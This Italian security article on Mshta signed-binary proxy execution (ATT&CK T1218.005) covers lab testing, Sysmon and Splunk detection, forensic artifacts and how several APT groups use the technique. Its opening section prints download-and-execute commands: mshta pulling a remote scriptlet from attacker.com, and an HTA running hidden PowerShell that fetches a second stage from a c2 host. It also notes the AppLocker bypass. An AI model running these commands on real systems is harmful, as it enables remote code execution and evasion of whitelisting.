Esecuzione tramite Mshta: Signed Binary Proxy Execution: Mshta (T1218.005)

Per testare efficacemente questa tecnica nel tuo lab, inizia con l'esecuzione diretta di script inline. Il comando base utilizza VBScript per recuperare payload remoti:

mshta vbscript:Close(Execute("GetObject(""script:https://attacker.com/payload.sct"")"))

Questa sintassi permette l'esecuzione immediata di scriptlet remoti senza salvare file su disco. Per scenari più complessi, puoi ospitare file HTA completi e richiamarli direttamente:

mshta http://testserver.local/backdoor.hta

La potenza di mshta emerge quando lo combini con altre tecniche. APT29 ha dimostrato come concatenare mshta con PowerShell per download multi-stage. Crea un HTA che scarica ed esegue ulteriori payload:

<script language="VBScript">
    Set shell = CreateObject("WScript.Shell")
    shell.Run "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://c2.local/stage2.ps1')"
    self.close
</script>

Per simulare tecniche più sofisticate come quelle di FIN7, incorpora l'offuscazione JavaScript. Strumenti come Koadic forniscono moduli pronti per generare stager HTA con encoding Base64 e routine anti-VM integrate.

Durante i test, monitora come mshta.exe bypassa AppLocker configurato in modalità permissiva. Noterai che l'esecuzione avviene nel contesto di un processo firmato Microsoft, rendendo inefficaci molte whitelist basate su publisher.

La detection efficace richiede focus sui pattern comportamentali piuttosto che sulle signature statiche. Configura Sysmon per catturare l'EventID 1 (Process Creation) filtrando su mshta.exe con particolare attenzione ai parametri della command line.

I pattern più critici includono riferimenti a URL esterni, utilizzo di protocolli non-HTTP come javascript: o vbscript:, e presenza di encoding Base64 negli argomenti. Un esempio di query Splunk efficace:

index=windows EventCode=4688 Image="*\\mshta.exe" 
(CommandLine="*http*" OR CommandLine="*ftp*" OR CommandLine="*vbscript:*")
| stats count by ComputerName, User, CommandLine

MuddyWater e Lazarus Group spesso lanciano mshta.exe da processi Office o script interpreters. Implementa correlation rules che flaggano questa parent-child relationship anomala, riducendo drasticamente i falsi positivi rispetto al monitoraggio generico di mshta.

Per ambienti con uso legittimo di HTA, costruisci una baseline dei path autorizzati. La detection di APT32 richiede attenzione ai renamed binaries: cerca processi con hash SHA256 identico a mshta.exe ma nome diverso.

Il tuning ottimale prevede whitelisting progressivo basato su source path e parent process. Inizia in modalità alert-only, raccogli pattern legittimi per 30 giorni, poi passa a blocking selettivo mantenendo eccezioni documentate per applicazioni legacy.

L'analisi forense di mshta abuse richiede correlazione tra molteplici artefatti. Inizia dal Prefetch: i file .pf di mshta.exe contengono timestamp di esecuzione e referenced files, cruciali per ricostruire la sequenza temporale.

Nel registro di Windows, esamina HKEY_CURRENT_USER\Software\Classes\htafile per modifiche alle associazioni file. Gamaredon Group modifica queste chiavi per persistence, lasciando tracce del timestamp di compromissione iniziale.

La ricostruzione della catena di esecuzione richiede l'analisi del ShimCache (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache). Qui troverai evidenze di mshta.exe lanciato con path non standard, pattern comune in Operation Dust Storm.

Per payload scaricati via HTTP, WebCache (%LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat) preserva URL e timestamp anche dopo cleanup parziale. Strumenti come ESEDatabaseView permettono parsing efficiente di questi database.

I memory artifacts sono particolarmente rilevanti: mshta.exe carica mshtml.dll per rendering, lasciando stringhe JavaScript/VBScript in process memory anche dopo terminazione dello script principale. Volatility plugin malfind identifica queste injection anomale.

La timeline reconstruction beneficia dall'analisi di Windows Event Log 4688 (Process Creation) correlato con EventID 3 di Sysmon (Network Connection). Sidewinder tipicamente mostra pattern di connessione immediata post-esecuzione verso C2 infrastructure.

APT29 (Cozy Bear) rappresenta l'adopter più sofisticato di questa tecnica. Il gruppo russo integra mshta in catene multi-stage, spesso come secondo stadio dopo initial foothold via spearphishing. I loro HTA contengono tipicamente PowerShell encoded che scarica Cobalt Strike beacon.

FIN7 dimostra approccio più commerciale: i loro mshta payloads sono modulari, riutilizzati across campagne con minor customizzazione. Pattern ricorrente: documenti Office con macro che lanciano mshta verso domini typosquatted di brand legittime.

Lazarus Group mostra evoluzione tattica interessante. Pre-2020 utilizzavano mshta per execution diretta, post-WannaCry hanno shiftato verso renamed binaries e execution tramite scheduled tasks, indicando adaptation a increased detection.

L'overlap tooling rivela cluster operativi: Kimsuky e APT32 condividono infrastruttura HTA hosting, suggerendo possibile tool sharing o common developer. Entrambi prediligono Vietnam/Korea targeting con lure documents tematici.

TA2541 rappresenta evoluzione criminale della tecnica: massive spam campaigns con HTA attachments diretti, volume over stealth approach. Infrastructure analysis mostra rotazione domini ogni 72 ore, pattern predittivo per proactive blocking.

Geographic clustering emerge chiaramente: gruppi Asia-Pacific (SideCopy, Earth Lusca) preferiscono mshta via LNK files, mentre attori Eastern European favoriscono Office macro chains. Questa preferenza regionale permette attribution preliminare basata su initial vector.

Tecnica documentata nel framework MITRE ATT&CK con coverage detection tramite Sysmon EventIDs e Windows Security logs. Campagne C0015 e Operation Dust Storm forniscono case studies operativi dettagliati. Reference implementations disponibili in Atomic Red Team per validation dei controlli proposti.